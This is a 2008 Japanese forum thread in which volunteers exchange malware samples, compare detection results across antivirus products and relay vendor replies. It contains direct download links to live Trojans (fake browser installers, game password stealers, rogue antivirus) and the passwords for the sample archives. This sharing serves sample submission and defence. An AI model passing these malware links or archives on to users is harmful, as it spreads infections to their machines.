XPAinstall_88.exek - Trojan-Downloader.Win32.FraudLoad.vatt

These files are already detected. Please update your antivirus bases.（これらのファイルは検知済み）

AV2009Install_77013605[1].exek

This file is corrupted.(ファイル破損）

dflgh8jkd2q8.exek,
vx.tll

No malicious code were found in these files.（有害なコードなし）

Please quote all when answering.

--
Best regards, Vladimir Krylov

>>102

カスペ2009
6/12(0,4,5,8,9,a)(（うち1ヒューリスティック：a）

Detected Trojan program Trojan.Win32.Delf.dwn 0/kil.exe
Detected Trojan program Trojan-Downloader.Win32.Delf.ktu 4/i.exe
Detected Trojan program Trojan-Downloader.Win32.Banload.rsr 8/torpedo.scr
Detected Trojan program Trojan.Win32.Delf.dwm 9/kil.exe
Detected Trojan program Heur.Downloader a/fotos.exe
Detected riskware not-a-virus:FraudTool.Win32.SecureExpertCleaner.a 5/CleanerInstaller.exe

先ほど7件提出。

カスペからの返事。
2件（1,a)検出（うち1種a：ヒューリからシグネチャに）。2件無害(7,b)。3件回答待ち(2,3,6)。現在、7/12(0,1,4,5,8,9,a)

fotos.exe_ => Trojan-Downloader.Win32.Delf.ljt (Andrey Ladikov)
setup_100527_3_.exe_ => New malicious software was found in the attached file.(新種。検体名不明）(Andrey Bezborodov,)
IPHACTION.dll_ ＝> No malicious software. (Vladimir Krylov)
FixMessenger_www.MsnTrucAstuce.fr ＝> No malicious software . (Vladimir Krylov)

セキュリティ初心者質問スレッドpart111
http://pc11.2ch.net/test/read.cgi/sec/1216554958/340

340 名前：名無しさん＠お腹いっぱい。[sage] 投稿日：2008/08/04(月) 00:38:27
ttp://www.youturebe.com/bbs/lineage/view/B000000G58.zip
このネトゲパス抜きツールに感染してしまったのですがスパイボットやノートンで検出されません、助けてください

AVG検出

>>122
DLしたものをそのままVTスキャン
http://www.virustotal.com/analisis/a60a6de20cf5bc538407c16f9e95c53a

KernaeghDrv.dll
これｷﾎﾞﾝﾇ

どうも、前ｽﾚの935です。
さっきｽｷｬﾝしたら何故か駆除していた筈なのに復活していた。
被害症状?はIEで時々中国のHPが勝手に表示される　ﾀﾌﾞﾌﾞﾗｳｻﾞでは何もなし

前ｽﾚの935の時の検出結果
ttp://www.virustotal.com/jp/analisis/e8d9e7169e5c92aa7bf2d71141bce5b4
今日の検出結果
ttp://www.virustotal.com/jp/analisis/07f86cca30ea2747b6f5d24e90c2648f

ｼﾃﾝﾏｯｸ、ﾏｶﾌｨｰ等はまだ対応していないぽいので、検体upしとく
ttp://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=53
fukuda

>>125訂正

今日の検出結果
ttp://www.virustotal.com/jp/analisis/708c34e1caaa4ac6b78ed4e675491857

>>126
NortonとMcAfeeとバスターに送った。

http://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=54
パス：infected

>>128
AVG全部撃墜！

>>125>>128
Risingスルー、送りました

VirSCAN.orgの結果>>125
ttp://www.virscan.org/report/faa86695d2a0b611ede2ba84ed3e2504.html

>>128
Avira AntiVir Freeも全部撃墜。
BitDefender Freeは全部スルー。

>>128
McAfee 10個検出

>>128
ウイルスバスター2008
TROJ_AGENT.AQAX -> AdultChannel[2].exe
TROJ_HACHILEM.AP -> app.exe
TROJ_HACHILEM.AZ -> EroAnimePlayer.exe
TROJ_HACHILEM.BA -> LoveLips.exe
TROJ_DLOAD.CH -> HyperErectCollection.exe,MovieTubes.exe
TSPY_VB.GBF -> SexyRoots.exe
TSPY_VB.GHU -> MoviesServiceProvider[2].exe
TSPY_VB.HPH -> EroAnimePlayer[2].exe
TROJ_VB.IIZ -> MoviesServiceProvider.exe

他は検体提出しておきます。
HACHILEMとかまだあるんだなー。ワンクリウェア全盛期はよく見かけたけど。

>>128
avast!も全部検出

>>128
F-Secureも全部撃墜

>>128
Risingより
   1.文件名：EroAnimePlayer[2].exe
   病毒名：Trojan.Win32.VB.ful
   2.文件名：HyperErectCollection.exe
   :)病毒名：Trojan.Win32.VB.fuk
   3.文件名：HyperErectCollection[2].exe
   病毒名：Trojan.Win32.VB.fuk
   4.文件名：LoveLips.exe
   病毒名：Trojan.Win32.VB.fum

3分割して送ったので他は解析待ち

>128
K7 Total Security 9.0
9.5.0513

8/15

>>128
カスペ2009

15/15

Detected Trojan program Trojan-PSW.Win32.VB.st one-click/AdultChannel.exe
Detected Trojan program Trojan-PSW.Win32.VB.tk one-click/AdultChannel[2].exe
Detected Trojan program Trojan.Win32.PopUpper.h one-click/app.exe
Detected Trojan program Trojan-PSW.Win32.VB.st one-click/EroAnimePlayer.exe
Detected Trojan program Trojan-PSW.Win32.VB.ta one-click/EroAnimePlayer[2].exe
Detected Trojan program Trojan-PSW.Win32.VB.ss one-click/HyperErectCollection.exe
Detected Trojan program Trojan-PSW.Win32.VB.tv one-click/HyperErectCollection[2].exe
Detected Trojan program Trojan-PSW.Win32.VB.sl one-click/LoveLips.exe
Detected Trojan program Trojan-PSW.Win32.VB.tk one-click/LoveLips[2].exe
Detected Trojan program Trojan-PSW.Win32.VB.sv one-click/MoviesServiceProvider.exe
Detected Trojan program Trojan-PSW.Win32.VB.tg one-click/MoviesServiceProvider[2].exe
Detected Trojan program Trojan-PSW.Win32.VB.sm one-click/MovieTubes.exe
Detected Trojan program Trojan-PSW.Win32.VB.tm one-click/MovieTubes[2].exe
Detected Trojan program Trojan-PSW.Win32.VB.su one-click/SexyRoots.exe
Detected Trojan program Trojan-PSW.Win32.VB.tw one-click/SexyRoots[2].exe

NOD32 3336 (20080807)

>>128
6つ

もしかしてNOD32はZEROにも劣る？
ウイルスの対応は遅いし。

KAV7.0 7.0.1.325
15/15
削除しました: トロイの木馬 Trojan-PSW.Win32.VB.st AdultChannel.exe//UPX
削除しました: トロイの木馬 Trojan.Win32.PopUpper.h app.exe//PE_Patch.UPX//UPX
削除しました: トロイの木馬 Trojan-PSW.Win32.VB.st EroAnimePlayer.exe//UPX
削除しました: トロイの木馬 Trojan-PSW.Win32.VB.tk AdultChannel[2].exe//UPX
削除しました: トロイの木馬 Trojan-PSW.Win32.VB.ta EroAnimePlayer[2].exe//UPX
削除しました: トロイの木馬 Trojan-PSW.Win32.VB.ss HyperErectCollection.exe//UPX
削除しました: トロイの木馬 Trojan-PSW.Win32.VB.tv HyperErectCollection[2].exe
削除しました: トロイの木馬 Trojan-PSW.Win32.VB.tm MovieTubes[2].exe//UPX
削除しました: トロイの木馬 Trojan-PSW.Win32.VB.sl LoveLips.exe//UPX
削除しました: トロイの木馬 Trojan-PSW.Win32.VB.sv MoviesServiceProvider.exe
削除しました: トロイの木馬 Trojan-PSW.Win32.VB.tg MoviesServiceProvider[2].exe//UPX
削除しました: トロイの木馬 Trojan-PSW.Win32.VB.tk LoveLips[2].exe//UPX
削除しました: トロイの木馬 Trojan-PSW.Win32.VB.sm MovieTubes.exe//UPX
削除しました: トロイの木馬 Trojan-PSW.Win32.VB.su SexyRoots.exe//UPX
削除しました: トロイの木馬 Trojan-PSW.Win32.VB.tw SexyRoots[2].exe

>>140
何をいまさら

NOD32のヒューリスティックはトロイには弱いから個別対応するしかない
しかし定義作成が遅いからなかなか検出されるようにならないし
サポートの鈍さに検体送る人も減ってますます検出力が下がる悪循環

>>143
avast!、AVGとは正反対を行ってるな＞NOD32

バスターですら検体解析ラボを増やして対応を良くしようとしてるというのに。
Symantecも今年に入ってから検出率や対応速度が良くなった気がするんだけどSymantecに何かあった？

解凍パス：virus
http://justic.dip.jp/~lennon/newvirus.zip

Kasperskyでは検知しなかったので報告しておきました。
他のアンチウィルスソフトでは確認していません。
あと、ウィルスのしわざなのか、Kasperskyの更新が出来なくなったので要注意です。

詳細を書いてなかったので追記します。
ウィルスチェックを行ったKasperskyは7.0で定義ファイルは8月１０日の午前９時に更新済みでした。

以下Kasperskyからの返信
---------------------------
Hello.
New malicious software was found in the attached file.
It's detection will be included in the next update. Thank you for your help.

Please quote all when answering. Do not forget to include you registration data.

>>145
カスペは検出してますよ？
ttp://www.virustotal.com/analisis/e97ab46786982f0a951b61591bc07452

>>147
おお、対応したんですね。報告ありがとうございます。
自分がカスぺに報告したのが１２時過ぎだったので、それに対応してくれた見たいです。
他のソフトは対応したか知らないので引き続き注意してください。

http://www.betil.hr/images/ie7.0.exe

>>149
http://www.virustotal.com/analisis/5439ff24b220e88328d495b09e3f9498

K7は期待を裏切りませんな

http://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=56
パス：infected

>>152
全部VTに投げてみた。
http://www.virustotal.com/analisis/6bbc562b760c20689d8508d56b6d37c6
http://www.virustotal.com/analisis/6bbc562b760c20689d8508d56b6d37c6
http://www.virustotal.com/analisis/bc385b451b5946f41829ce71911cda4d
http://www.virustotal.com/analisis/d82b418652ccd845de6fb908573a0a39
http://www.virustotal.com/analisis/41a67202deccc2cff009abdca21adcfa

全部検出できたのはAVGだけ。
一時期最強だと思われたAntiVirがここ最近どうもよくない気がする（これ以外のマルウェアファイルでもスルーが目立つ）
AntiVirもカスペと同じ道歩んでしまうのか・・・

>>153は重複してるのがあった失礼
もう一つが↓これ
http://www.virustotal.com/analisis/c28f47d478ca1e9887835d4a982f74a0

MSも全部検出できてたね。

ここ数日でXREAのあちこちに突っ込まれたスクリプトが実行するトロイ
ttp://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=57
virus

>>155
http://www.virustotal.com/analisis/bbcd727b7e82c16de62d43193421454b
http://www.virustotal.com/analisis/012d278b0deb0b64f98e3518863aca8f
http://www.virustotal.com/analisis/8e2651443274b5a034e5d6c69e8fefd9
http://www.virustotal.com/analisis/29acffdf95a44c27698083dd34998fde


全部検出：AVG、カスペ、MS
3個検出：Symantec
2個検出：AntiVir、BitDefender、バスター
オールスルー：avast!、McAfee、NOD32

それにしてもNODは酷すぎる。

>>152
KAV7
検体送り

>>144

> Symantecも今年に入ってから検出率や対応速度が良くなった気がするんだけどSymantecに何かあった？

ノートン使いだけどそんな実感ないなぁ

あ

>>152
>>155
McAfeeに未検出のを投げた

　　　　　　　　　＿＿＿
　　　　　　 ／ ＼　　／＼　ｷﾘｯ
　　　　　／　（ー） 　（ー）＼
　　　　／　　 ⌒（__人__）⌒ ＼　　　　＜AntiVirもカスペと同じ道歩んでしまうのか
　　　　|　　 　　　|r┬-|　　　　|
　　　　 ＼　　　　 `ー'´　　 ／
　　　　ノ　　　　　　　　　　 　＼
　 ／´　　　　　　　　　　　　 　　ヽ
　|　　　　ｌ　　　　　　　　　　　　　　＼
　ヽ　　　 -一''''''"~~｀`'ー--､　　　-一'''''''ー-､. 　 　
　　ヽ ＿＿＿＿(⌒)(⌒)⌒)　)　　(⌒＿(⌒)⌒)⌒))

　 　　　　 　　　＿＿＿_
　　　　　　　 ／_ノ 　ヽ､_＼
　ﾐ　ﾐ　ﾐ　　oﾟ(（●）) (（●）)ﾟo　　　　　　ﾐ　ﾐ　ﾐ
/⌒)⌒)⌒. ::::::⌒（__人__）⌒:::＼　　　/⌒)⌒)⌒)
|　/　/　/　　　　　|r┬-|　　　　|　(⌒)/　/ / /／　　　だってお
|　:::::::::::(⌒)　　　　|　|　 |　　 ／ 　ゝ　　:::::::::::/
|　　　　　ノ　　 　　|　|　 |　 　＼　　/　　）　　/
ヽ　　　　/　　　　　`ー'´ 　 　 　ヽ /　　　　／
　|　　　　|　　 l||l　从人 l||l 　　　　 l||l 从人 l||l
　ヽ　　　 -一''''''"~~｀`'ー--､　　　-一'''''''ー-､
　　ヽ ＿＿＿＿(⌒)(⌒)⌒)　)　　(⌒＿(⌒)⌒)⌒))

>>152
カスペ2009
5/5

Detected Trojan program Trojan-PSW.Win32.VB.ud one-click/AdultManiac.exe
Detected Trojan program Trojan-PSW.Win32.VB.ui one-click/HyperErectCollection.exe
Detected Trojan program Trojan-PSW.Win32.VB.uj one-click/LoveLips.exe
Detected Trojan program Trojan-PSW.Win32.VB.ul one-click/MovieTubes.exe
Detected Trojan program Trojan-PSW.Win32.VB.uh one-click/SexyRoots.exe

AntiVirにしてもNOD32にしても、ヒューリスティックが強みの製品だから
高度なマルウェア作者が回避策を講じてくると、次第に検出率が下がってくる
何しろ作者は放流前に自分でチェックできるから、ある意味勝ち目はない

AntiVirは定義作成も早いから、どんどん検体を提出して補強するしかないな

AntiVirはヒューリスティックよりパターン寄りな気がする
(Packerを黒判定し出したので未知の物に強く見えるが)。

>>152>>155
Risingに送付完了

ヒューリスティック寄りなベンダーはNOD32とPandaぐらいじゃね？
JottiをｦﾁしてるとNODはヒューリスティックで検出しまくってるのを見る。

>>152
KAV7も全部対応した

>>167
VBAも結構なイメージ
単なる印象だが

>>152
>>155
ウイルスバスター検体提出
検出結果は直後に貼ってあるVTの通り

>>167
>>169 に同意。VBA32のパラノイドヒューリスティックは鬼。
ttp://www.virustotal.com/analisis/8f6b7b69e924d05c9928e392ca375121
この水準に達するのはあとDr.WEBくらいしかない。
Mirosoftは今ひとつわからん。

XREAトロイ( >>155 )の新型
ttp://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=58
virus

>>172>>102
いつもオツカレです


あやうくアプロダのレンタル鯖料金払わずに
止められるところだったよ。

盆休みでちょっと浮かれすぎてたwww

おいぃ?

クレカ払いにしたからもう安心です^^

>>173
乙

>>172
VT
http://www.virustotal.com/analisis/6dd1672acb503b55b4a9ff5765a81085
http://www.virustotal.com/analisis/24d159ef407f789244295f47f7c2ecd9

このPacker(アルマジロ?)初めて見た

>>172
McAfee投げた

Armadilloはスタブがでかいから、一瞬で感染させたいマルウェアには向いてないんかもしれん

そしてアルマジロじゃなくなった。

XREAトロイ( >>172 )の新型
ttp://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=59
virus

リネージュ2のパス抜き、3匹目のsysはカーネルモードドライバ。

>>180
�d

カスペ2009
2/3

Detected Trojan program Trojan-GameThief.Win32.OnLineGames.sqje tane0059.zip/xrea4taa.exe
Detected Trojan program Trojan-GameThief.Win32.OnLineGames.sqgn tane0059.zip/xrea4taa1.dll

3匹目は検体提出しました。

>>172>>180
Risingスルー
検体送付済み

カスペからの返事


>>180

This file is corrupted.

む、Sophosは引っ掛けてくれたけど、どっか欠けたか。

>>180
McAfee投げた

http://89.187.49.18/IE-7.0.exe

>>125の症状の原因？
ttp://www.virustotal.com/jp/analisis/674f4ebe15f98570e862a851e8a1ad4b

ttp://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=60
sage

>>186
BitDefender以外の主要ベンダー全滅

>>187
誤検知じゃね?

ﾊﾞｽﾀｰが検出してるってことは
誤検出の可能性大だな

>>186
AVG撃墜！

>>187
AVG送付済み

http://maplesarasi.dip.jp/aa/exe.php?image=http%3A%2F%2Fvirusscan.jotti.org%2Fimages%2Fkaspersky.png&resolution=1&mode=2&color=%23000000&font-size=11&line-height=9&letter-spacing=0&fixed_char=W
ちょっと遊んでみた

>>186
http://www.virustotal.com/analisis/4e20229cce1078457c9540c6fe359966
大分対応が進んだね

http://webtron.org/up/img/243.zip

>>194
いま拾ってみたらMD5が違う、差し替えられたのか？
187bb0d1836e63f48ef97eb03a018126

XREAトロイ( >>180 )の新型とおまけ。
ttp://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=61
virus

>>196
IE7スパムとCNN(今はmsnbcか)スパムは更新が激しい(zlobほどじゃないけど)。

>>197
McAfee　3つ検出

ついでに4のsys以外はこれまでの全部対応済

Risingより
>>172>>180
   1.文件名：xrea3drop.exe
   病毒名：Trojan.PSW.Win32.GameOL.phu
   2.文件名：xrea3troj.exe
   病毒名：Trojan.PSW.Win32.GameOL.phu
   3.文件名：xrea4taa.exe
   病毒名：Trojan.PSW.Win32.GameOL.pim
   4.文件名：xrea4taa1.dll
   病毒名：Trojan.PSW.Win32.GameOL.pim
   5.文件名：xrea4taa2.sys
   不是病毒

Rising Antivirus 20.57.42
>>197
fsg1.exe>>fsg2.0: Trojan.DL.Win32.Small.vry
troj.exe: Trojan.Win32.Undef.kmz
upk1.exe>>upack0.39: Trojan.DL.Win32.Undef.abe
upk2.exe>>upack0.39: Trojan.Win32.Undef.kff

>>155 （いつ対応したか不明）
xrea2drop.exe: Trojan.PSW.Win32.GameOL.pgu
xrea2troj.exe: Trojan.PSW.Win32.GameOL.pgv

�d
>>197
カスペ2009 ＠17：22：00
6/6


Detected Trojan program Backdoor.Win32.Small.dmz fsg1.exe
Detected Trojan program Trojan.Win32.Obfuscated.uya troj.exe
Detected Trojan program Trojan-Downloader.Win32.Agent.aauc upk1.exe
Detected Trojan program Trojan-Downloader.Win32.Small.zie upk2.exe
Detected Trojan program Trojan-GameThief.Win32.OnLineGames.srcs xrea5taa.exe
Detected Trojan program Trojan-GameThief.Win32.OnLineGames.sreq xrea5taa1.exe

>>186はスルーしたので、検体提出。

検出していました。orz

>>186
IE-7.0.exe
Detected Trojan program Backdoor.Win32.Frauder.i

>>201
788056EE1FC33F9F407142C8D8C1320Bは当初未対応だった、やっぱカスペは速いね

>>186を昨日の時点でDLしたもの↓

ttp://www.virustotal.com/analisis/c6c8dd998c9fd2253b9903938c319db1

確実にSymantecの対応は速くなってる。

23/26検出の状況で対応が速くなってると言ってもね
普通じゃね

前はNODと並んでビリケツ同然だったからな
それよりはマシになったんだろう

http://nathan-vasilisim.hp.infoseek.co.jp/04-01-03.html

AntiVirで検出されます　[TR/Dldr.Harnig.Y.4]

>>205
最近のSymantecは3〜4日で対応してくれることが増えてきた。
まあ遅いこともまだまだあるのは確かだけど。

Kingsoftも参加

//tklolicon.phpnet.us/b/

このURLを踏んでしまいました
その貼ってあったスレでトロイと言われたのですが本当でしょうか？

>>207
→>>203
その日の内に対応してるよ

ttp://www.tane.sakuratan.com/upload/upload.cgi?mode=dl&file=63
Malware-Pack38

>>210
他社も即日対応してるから自慢にならん
おそらく感染被害が多かったんだと思う

>>211
Rising Antivirus 20.57.50
8\wab.exe: Packer.Win32.Agent.r

>>211乙
NIS2008で3/12 （1、7、a、）
未検出は贈っておきました

>>212
感染被害が多いor少ないのと
対応速度はまったく別の話だよ

報告数の多い検体から先に処理するのは常識だが

>>215
え？

＞報告数の多い検体から先に処理するのは常識

今、調査してみたら
Nortonユーザーで、>>203の感染者はとくに多くはなかったし

>>218
どんな調査を行ったのか詳細よろ

>>211
0 http://www.virustotal.com/jp/analisis/7f478b0846bd800bb8a06a216809aaf8
1 http://www.virustotal.com/jp/analisis/9120f2915430ecbd042bf71b16ae782c
2 http://www.virustotal.com/jp/analisis/33b37f9c458abec948208869c964abb5
3 http://www.virustotal.com/jp/analisis/e7562ee0966c11cf55fa96f735229eb1
4 http://www.virustotal.com/jp/analisis/ba2855c776aef9c84d6018e7971013f1
5 http://www.virustotal.com/jp/analisis/3b3a4d5517a622c75d00570f8809f155
6 http://www.virustotal.com/jp/analisis/4a595a465556e786ad928ea4239c28d5
7 http://www.virustotal.com/jp/analisis/7aeb073ed80197e1d1f71c35277ab18f
8 http://www.virustotal.com/jp/analisis/d7b991cc2d2aba95af0061f36a02d07d
9 http://www.virustotal.com/jp/analisis/f637b5b6124d1c2c81d2c0ad1f5c17b9
a http://www.virustotal.com/jp/analisis/dacd08c04a56549a37b1e5f769225572
b http://www.virustotal.com/jp/analisis/04fc0b10625415509a8032893309b261

>>219
ttp://www.symantec.com/ja/jp/security_response/writeup.jsp?docid=2008-062711-5534-99
Trojan.Blusod
感染報告数: 0 - 2

> >>186を昨日の時点でDLしたもの↓

> 発見日: 2008 年 6 月 27 日
> 更新日: 2008 年 6 月 30 日 9:38:31 AM

対応速ええｗ

XREAトロイ( >>197 )の新型
ttp://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=64
virus

>>211,223
�d

カスペ2009 17:23:00
>>211
4/12(3,6,7,b)

Detected Trojan program Trojan-Downloader.Win32.Banload.tdx tane0063\Malware\3\telegrama489019283.exe
Detected riskware not-a-virus:FraudTool.Win32.Agent.at tane0063\Malware\6\pcprotectioncenter_setup.exe
Detected Trojan program Trojan.Win32.Agent.ycd tane0063\Malware\7\name.avi.exe
Detected Trojan program Trojan-Downloader.Win32.Banload.stt tane0063\Malware\b\install_flash_player.exe

検体提出します。

>>223

3/3
Detected Trojan program Trojan-GameThief.Win32.OnLineGames.sreq tane0064.zip/xrea6.dll
Detected Trojan program Trojan-GameThief.Win32.OnLineGames.srkz tane0064.zip/xrea6.exe
Detected Trojan program Trojan-GameThief.Win32.OnLineGames.srkt tane0064.zip/xrea6.sys

>>209もおねがいします！

>>225
AVGだと検出しなかったけどな。不安なら無料アンチウイルスソフトを常駐させておきな。

>>225
ここは鑑定スレではありません。

http://pc11.2ch.net/test/read.cgi/hack/1208760889/

>>221
カスペからの返事。index2.htmは回答待ち。
合計 8/12（１回答待ち）

Hello.
New malicious software was found in the attached file.
It's detection will be included in the next update. Thank you for your help.

IAInstall.exe - Trojan-Downloader.Win32.FraudLoad.vbek (Vyacheslav Zakorzhevsky)
Trojan-Downloader.Win32.FraudLoad.vbek - (Andrey Bezborodov,)
tracesweeper_setup.exe - not-a-virus:FraudTool.Win32.TraceSweeper.a
wab.exe_ - Trojan-Downloader.Win32.Dadobra.azp

---------------------------------------------------------
Hello.

skinnerv.exe (Andrey Bezborodov,)
MDL_1.4.5408.exe (Vyacheslav Zakorzhevsky)
Belote.exe (Andrey Bezborodov,)

No malicious software was found in the attached file.

>>211
236789abが黒、5がグレー、014が白、でFAかな

>>211
kingsoft

7=Win32.Troj.Agent134144
b=Win32.TrojDownloader.Banload.17920

>>223
スルー


両方ともKingsoftに送りました

K7AntiVirus 9.5.0521

>>197
2/6
fsg1.exe,Infected by Backdoor.Win32.Small.dmz,Cleaned ,
upk1.exe,Infected by Trojan-Downloader.Win32.Small.wuz,Cleaned ,

>>211
1/12
Malware\6,pcprotectioncenter_setup.exe,Infected By not-a-virus:FraudTool.Win32.Agent.at

>>223
0/3

>>223
Rising Antivirus 20.57.52
スルー

>>223
McAfeeスルーヽ(`Д´)ﾉ

XREAトロイ( >>223 )の新型とおまけ。
ttp://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=65
virus

おまけはあちこちにscriptを突っ込んでいる1ive■netでばら撒き中のダウンローダが拾うバイナリ。

>>234
Rising Antivirus 20.57.52
mess.exe>>DLLFILE2: Trojan.PSW.Win32.GameOL.oub
mess.exe: Trojan.PSW.Win32.GameOL.oub
mess2.exe: Trojan.PSW.Win32.GameOL.oub

>>234
McAfee

mess.exe, mess1.exe, mess2.exe : Generic PWS.y

xrea6.sysとxrea7.sysはMD5一緒じゃね？

大元のexeしかハッシュチェックしてません
(sysはexeからドロップされる物、たぶんrootkit)。

Risingより
>>197
   文件名：xrea5taa.exe, xrea5taa1.exe
   病毒名：Trojan.PSW.Win32.GameOL.pjg

Risingより
>>211
   文件名：MDL_1.4.5408.exe
   不是病毒
他は解析待ち
>>223
   文件名：xrea6.dll, xrea6.exe
   病毒名：Trojan.PSW.Win32.WoWar.asm
   文件名：xrea6.sys
   不是病毒

>>234
�d
カスペ2009 16：23：00

6/6

Detected Trojan program Trojan-GameThief.Win32.WOW.bhs tane0065.zip/mess.exe
Detected Trojan program Trojan-PSW.Win32.WOW.arz tane0065.zip/mess1.exe
Detected Trojan program Trojan-GameThief.Win32.WOW.bht tane0065.zip/mess2.exe
Detected Trojan program Trojan-GameThief.Win32.OnLineGames.sreq tane0065.zip/xrea7.dll
Detected Trojan program Trojan-GameThief.Win32.OnLineGames.srvv tane0065.zip/xrea7.exe
Detected Trojan program Trojan-GameThief.Win32.OnLineGames.srkt tane0065.zip/xrea7.sys

http://webtron.org/up/img/243.zip

>>242
http://www.virustotal.com/analisis/e8d56b5767d06f4cd24ec2b7be6b8f7d

http://www.cyokinde.com/gungho08/ro/10155326p.rar

>>244
http://enif.mmobbs.com/test/read.cgi/livero/1213363112/779

>>244
http://www.virustotal.com/jp/analisis/5b93df4c90e1cb6510c32e5aace15444

いつの間にかjottiからa2が消えてるな

http://www.excite-blog.com/keyword/d0808033566_5linmovesmm2.rar

>>248
http://www.virustotal.com/analisis/2c497c6c566604796cd4fe8396fe8f9e

ついでに>>244はSymantec対応
http://www.virustotal.com/analisis/2c497c6c566604796cd4fe8396fe8f9e

>>250
URLが>>249

>>251
失礼しました
http://www.virustotal.com/analisis/a03fbf5d6a826bcca6035ad95cf7c75c

>>247
a2復活してるな。一時メンテだとしても、わざわざバナーまで消すとは。

http://venus.bbspink.com/test/read.cgi/ascii/1218206258/561

>>254
>>3

>>254
http://www.virustotal.com/analisis/17c3254f8441dd234d42d1d54c4a040e

【緊急!】ウイルス即行駆除方法【助けて!】Part3
http://pc11.2ch.net/test/read.cgi/sec/1214830385/244

244 名前：名無しさん＠お腹いっぱい。[] 投稿日：2008/08/20(水) 04:19:59
DLしたファイルを開いたら偽造された実行ファイルでウイルスバスターが隔離したけど、
ものすごい速度でファイルをコピーしはじめてそれは隔離されたので削除しました。とりあえず怪しい実行ファイルのプロセスを終了して
今ウイルスバスターでスキャンかけてます。
デスクトップに二つアイコンが出来て「PEEP SHOW」てのと「Vista Antivirus 2008」ってのです。
検索の途中ですけど「TROJ_BHO.SK」がひっかかってますが「ウイルスが処理できません」です。
もうリカバリしかないでしょうか？よろしくお願いします

書庫にまでパスかけるのはやめてほしいなあ

いやそれは必須でしょ

検知力テスト（2008年8月23日）
Most Effective Antivirus Tools Against New Malware Binaries
ttp://mtc.sri.com/live_data/av_rankings/

Rank Detects Missed Product
1st 97% 95 AntiVir
2nd 96% 106 Webwasher-Gateway
3rd 94% 174 Ikarus
4th 93% 205 BitDefender
5th 92% 256 AVG
6th 92% 264 F-Secure
7th 89% 356 Avast
8th 88% 375 Norman
9th 88% 378 Sophos
10th 85% 477 Kaspersky
11th 85% 480 ClamAV
12th 84% 514 Microsoft
13th 84% 517 CAT-QuickHeal
14th 84% 537 VirusBuster
15th 82% 577 DrWeb
16th 80% 656 Rising
17th 80% 670 F-Prot
18th 80% 670 Fortinet
19th 79% 690 eTrust-Vet
20th 79% 692 Symantec
21st 76% 780 TheHacker
22nd 74% 874 AhnLab-V3
23rd 73% 888 VBA32
24th 73% 902 McAfee
25th 72% 942 Panda
26th 70% 988 Authentium
27th 69% 1020 NOD27w

>>260

スレ違い＆信頼性に欠けるデータ
Wilders Security Forumsの奴も取り上げないよ。

たった3372の検体で何が分かるんだろうなｗ

NODが糞なのはわかる

俺のところにしょっちゅうメールでマルウェアが来るが
俺の環境だとNODあたりはもっと良いね
avastやBitDefenderはもっと悪い
実際の運用では環境によってかなり違うだろうな

↑所詮お前の環境だろ。
このスレではNODはゴミという事実は消えないよ。
しかもAV-Testのテスト結果でもNODはゴミという評価だし。

おまえ馬鹿だろ
いや基地外か

NOD厨が基地外

NOD厨とか言ってるのが基地外だろ
よく感がえろ
無理だろうけど

NODは優秀なのでSRI捏造テストのインチキ検体はスルーします^^

感がえろ(笑)
感がえろ(笑)
感がえろ(笑)

×感がえろ
○よく感がえろ

NOD厨の日本語能力はゆとり以下

>>272
よく感がえろ

このスレではぶっちぎり最下位のNODの信者が発狂して荒らしてますｗ

今やNODはなぜかバスター、ノートンより２ｃｈじゃ有名

よく感がえろ

NODは悪い意味でノートンやバスターより有名。

バスターより早く公式HPでウイルスばらまいたしねｗ

ウイルス対応速度

AntiVir、AVG、カスペ：1日、遅くても2日
avast!、BitDefender、Norton、バスター：早くて1〜2日、遅くて3日以上

NOD27：早くて一週間、遅くて20日以上、最悪の場合対応しない。

いろいろ検体送ったけどマジでNODはこんな感じだった。
マカフィーはどう？印象としてはNODと同じくらいな気がするけど。

>>278
McAfeeは俺の送ったサンプルの対応期間だと
1/3が1週間以内に対応、1ヶ月以内に6割弱、半年で8割、
1年で99%、それ以上かかるのが少々ってとこか

シロ判定の返事は来ないんで、いまだに検出しないのは
対応しないのかこれから対応するのか判断がつかん

数字間違った
半年で9割に訂正してくれ

数学大丈夫?

ま、どっちにしてもマカフィーの対応速度もかなり酷いな。
ノートンはまだ噂の段階だけど2009で一日のアップデート回数がかなり増えるみたいだから今後のノートンの検出率とウイルス対応速度の向上に期待。

バスターはやはりtrendlab USAが効いてるのかな?

ttp://www.tane.sakuratan.com/upload/upload.cgi?mode=dl&file=67
Malware-Pack39

http://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=68
パス：infected

Rising Antivirus 20.59.11
>>282
4\10.exe: Trojan.DL.Win32.Mnless.avt
5\8.exe: Trojan.DL.Win32.Mnless.avk
b\setup.exe>>$WINDIR\setups.exe>>$WINDIR\IEBHO.dll,
b\setup.exe>>$WINDIR\setupc.exe>>$WINDIR\IEBHO.dll: AdWare.Win32.Agent.cda
>>283
AdultManiac.exe>>upx_c,
EroAnimePlayer.exe>>upx_c: Trojan.Win32.VB.ful
HyperErectCollection.exe>>upx_c: Trojan.Win32.VB.fuk

>>282,>>283
�d

カスペ2009

>>282
9/12

Detected riskware not-a-virus:FraudTool.Win32.XPAntivirus.pi tane0067.zip/Malware/0/maxantispy.exe
Detected riskware not-a-virus:FraudTool.Win32.XPShield.d tane0067.zip/Malware/1/XPGuardSetup.exe
Detected riskware not-a-virus:FraudTool.Win32.MSAntivirus.a tane0067.zip/Malware/2/MSASetup.exe
Detected riskware not-a-virus:FraudTool.Win32.MSAntivirus.a tane0067.zip/Malware/2/MSASetup.exe
Detected Trojan program Trojan-Downloader.Win32.Tiny.bvl tane0067.zip/Malware/4/10.exe
Detected Trojan program Trojan-Downloader.Win32.Agent.abxz tane0067.zip/Malware/5/8.exe
Detected Trojan program Trojan-Downloader.Win32.Exchanger.qb tane0067.zip/Malware/6/player.exe
Detected Trojan program Trojan.Win32.BHO.gef tane0067.zip/Malware/7/c-setup.exe
Detected Trojan program Trojan-Downloader.Win32.Banload.acs tane0067.zip/Malware/9/antivirus.v.1.0.exe
